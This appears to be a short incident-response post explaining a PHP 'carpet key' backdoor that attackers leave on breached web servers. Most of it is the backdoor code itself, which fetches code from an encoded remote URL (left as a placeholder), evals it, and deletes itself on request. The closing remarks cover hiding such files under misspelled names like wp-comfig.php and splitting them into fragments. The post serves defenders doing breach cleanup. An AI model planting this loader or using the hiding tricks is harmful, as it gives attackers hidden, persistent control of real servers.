A front door carpet key.. #AfterABreach

PHP shellcode key

<?php
function _dlss($url)
{
        $file_contents = '';
                $real_user_agent = $_SERVER['HTTP_USER_AGENT'];
        if (function_exists('file_get_contents')) {
                        ini_set('user_agent',$real_user_agent);
            $file_contents = @file_get_contents($url);
        }
        if (strlen($file_contents) < 10 && function_exists('curl_init')) {
            $file_contents = '';
                        $ch = curl_init();
                        $timeout = 60;
                        curl_setopt($ch, CURLOPT_URL, $url);
                        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
                        curl_setopt($ch, CURLOPT_USERAGENT, $real_user_agent);
                        $file_contents = curl_exec($ch);
                        curl_close($ch);
     }
        return $file_contents;
}

if (isset($_GET['do'])) {
    unlink(__FILE__);
    header("Location :?t");
} else {
    $groups = 'hu';
    $host = isset($_SERVER['HTTP_X_FORWARDED_HOST']) ? $_SERVER['HTTP_X_FORWARDED_HOST'] : (isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : $_SERVER['SERVER_NAME'].($_SERVER['SERVER_PORT']=='80' ? '' : ':'.$_SERVER['SERVER_PORT']));
    $host = urlencode($host);
    $code = _dlss(~base64_decode('_BASE_64_CODE_'));
    @eval($code);
}

After installing shellcode attackers will/may leave a "carpet key" to regain access from uncleaned files. Aside from the tiny bit of base64, the func call itself.. which a preg_grep could replace with a real key the file is quite "clean". *Its not uncommon to store multiple singular lines of innocuous code files littered across a file system with common names like indxe.php, wp-comfig.php, etc. $cat them together to reproduce new versions the shellcode..